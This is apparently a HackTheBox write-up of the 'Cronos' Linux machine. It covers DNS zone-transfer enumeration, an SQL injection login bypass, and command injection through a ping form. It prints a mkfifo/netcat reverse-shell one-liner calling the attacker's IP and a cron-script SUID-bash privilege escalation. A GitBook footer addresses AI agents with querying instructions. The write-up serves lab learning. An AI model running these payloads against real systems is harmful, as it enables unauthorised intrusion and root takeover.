# Cronos ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2F9J1P8cU5VcFA2WFSR2ev%2Fcronos.png?alt=media\&token=1b8434ed-f75d-43bd-9e9b-10e9b20c7a05) ## Enumeration As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports. The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file: > nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.13 -oN allPorts * `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections. * `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second. * `-p-` scanning the entire port range, **from 1 to 65535**. * `-T5` **insane** mode, it is the fastest mode of the nmap time template. * `-Pn` assume the host is **online**. * `-n` scan without reverse **DNS** resolution. * `-oN` **save** the scan result into a file, in this case the *allports* file. ``` # Nmap 7.92 scan initiated Wed Jun 29 00:34:52 2022 as: nmap -sS -p- --min-rate 5000 -Pn -n -oN allPorts 10.10.10.13 Nmap scan report for 10.10.10.13 Host is up (0.060s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 53/tcp open domain 80/tcp open http # Nmap done at Wed Jun 29 00:35:06 2022 -- 1 IP address (1 host up) scanned in 13.90 seconds ``` Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file: > nmap -sC -sV -p22,53,80 10.10.10.13 -oN targeted * `-sC` performs the scan using the default set of **scripts**. * `-sV` enables **version** detection. * `-oN` **save** the scan result into file, in this case the *targeted* file. ``` # Nmap 7.92 scan initiated Wed Jun 29 00:35:23 2022 as: nmap -sCV -p22,53,80 -oN targeted 10.10.10.13 Nmap scan report for 10.10.10.13 Host is up (0.047s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA) | 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA) |_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519) 53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux) | dns-nsid: |_ bind.version: 9.10.3-P4-Ubuntu 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-title: Apache2 Ubuntu Default Page: It works |_http-server-header: Apache/2.4.18 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Jun 29 00:35:40 2022 -- 1 IP address (1 host up) scanned in 17.48 seconds ``` If we take a look at the website, we'll see the *Apache2* default page with no much going on. ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FeU4g6eR1dE35kMNTokII%2Fimage.png?alt=media\&token=156be209-fb83-4d08-987c-77e9725ceee5) But, as port *53* (DNS) is open, we could get a domain name with *nslookup*. > nslookup ``` > server 10.10.10.13 Default server: 10.10.10.13 Address: 10.10.10.13#53 > 10.10.10.13 13.10.10.10.in-addr.arpa name = ns1.cronos.htb. ``` And we get the `ns1.cronos.htb` domain name. Now that we know the domain name, we could try to get all the subdomains with *dig*. > dig axfr @10.10.10.13 cronos.htb ``` ; <<>> DiG 9.18.1-1-Debian <<>> axfr @10.10.10.13 cronos.htb ; (1 server found) ;; global options: +cmd cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800 cronos.htb. 604800 IN NS ns1.cronos.htb. cronos.htb. 604800 IN A 10.10.10.13 admin.cronos.htb. 604800 IN A 10.10.10.13 ns1.cronos.htb. 604800 IN A 10.10.10.13 www.cronos.htb. 604800 IN A 10.10.10.13 cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800 ;; Query time: 60 msec ;; SERVER: 10.10.10.13#53(10.10.10.13) (TCP) ;; WHEN: Wed Jun 29 17:12:53 CEST 2022 ;; XFR size: 7 records (messages 1, bytes 203) ``` Let's add the `cronos.htb` and the `admin.cronos.htb` domain names to the `/etc/hosts` file. > nano /etc/hosts ``` # Host addresses 127.0.0.1 localhost 127.0.1.1 alfa8sa ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes f02::2 ip6-allrouters 10.10.10.13 cronos.htb admin.cronos.htb ``` If now we take a look at the `cronos.htb` website, we'll see a `CRONOS` website with nothing interesting in it. ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2Fb9zupVeShNPDUIhCpws1%2Fimage.png?alt=media\&token=9375f7e7-a5f5-4416-8125-6925eaec5860) But, if we take a look at the `admin.cronos.htb`, we'll see a login panel. ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FaGAZkQkFUjLqE4PQXq04%2Fimage.png?alt=media\&token=e8ad7d2f-e85d-49a5-ad3f-b5add087e8f5) ## Exploitation I tried to bypass the login page with a basic *SQL injection* payload, logging in as the user `' or 1=1-- -` and a random password. ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FOJzIY4T3gyWGFIyNWvy3%2Fimage.png?alt=media\&token=261ad6e5-52d3-46ce-86ad-24014eef75ae) And it worked. ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2F1o9qaXJita0HMkAKfPhv%2Fimage.png?alt=media\&token=1aed1f23-878c-4205-b920-cc92e7d82f3f) From here we can execute *traceroute* or *ping*. So I tried to ping my local machine, and it worked. ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FzjprYMst1TAxWBYOoZy2%2Fimage.png?alt=media\&token=39af1037-e558-4d49-a6a2-089e92fbc156) It seems like the website is executing a command on the system. We could try to execute another command, after the ping command, which will send us a revere shell. First, let's start a *netcat* listener on port *4444*. > nc -lvnp 4444 * `-l` **listen** mode. * `-v` **verbose** mode. * `-n` **numeric-only** IP, no DNS resolution. * `-p` specify the **port** to listen on. Now, if we select *ping*, and introduce the following payload, we should get a reverse shell as the `www-data` user, and we'll be able to grab the user flag. > ;$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.8 4444 >/tmp/f) ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FYDA6HCesQZfwUmQS5ZRh%2Fimage.png?alt=media\&token=029e3b81-8f0b-407b-aecc-7d07f8ac5326) ``` listening on [any] 4444 ... connect to [10.10.14.8] from (UNKNOWN) [10.10.10.13] 45316 /bin/sh: 0: can't access tty; job control turned off $ whoami www-data $ cat /home/noulis/user.txt 115a1db22c9ec5497b1c7f5dd9816560 ``` ## Privilege Escalation First, let's set an interactive *TTY* shell. > script /dev/null -c /bin/bash Then I press `Ctrl+Z` and execute the following command on my local machine: > stty raw -echo; fg > > reset > > Terminal type? xterm Next, I export a few variables: > export TERM=xterm > > export SHELL=bash Finally, I run the following command in our local machine: > stty size ``` 51 236 ``` And set the proper dimensions in the victim machine: > stty rows 51 columns 236 If we list the *cronjobs* available on the machine, we'll see that every minute, *root* is executing a *PHP* script. > cat /etc/crontab ``` # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) * * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1 # ``` If we take a look at the script permissions, we'll see that `www-data` is the owner, and we can modify it. > ls -l /var/www/laravel/artisan ``` -rwxr-xr-x 1 www-data www-data 1646 Apr 9 2017 /var/www/laravel/artisan ``` We could put some *PHP* code that will give the `/bin/bash` the *SUID* permission, so we can execute it as the root user. > echo '\' > /var/www/laravel/artisan If now we wait for one minute, we'll see that now the *bash* binary has the *SUID* permission set. > ls -l /bin/bash ``` -rwsr-xr-x 1 root root 1037528 Jun 24 2016 /bin/bash ``` And finally, all we have to do is reap the harvest and take the root flag. > bash -p ``` bash-4.3# whoami root bash-4.3# cat /root/root.txt f29ac94d898df107590adef9b2968361 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://alfa8sa.gitbook.io/htb-writeups/linux-machines/cronos.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.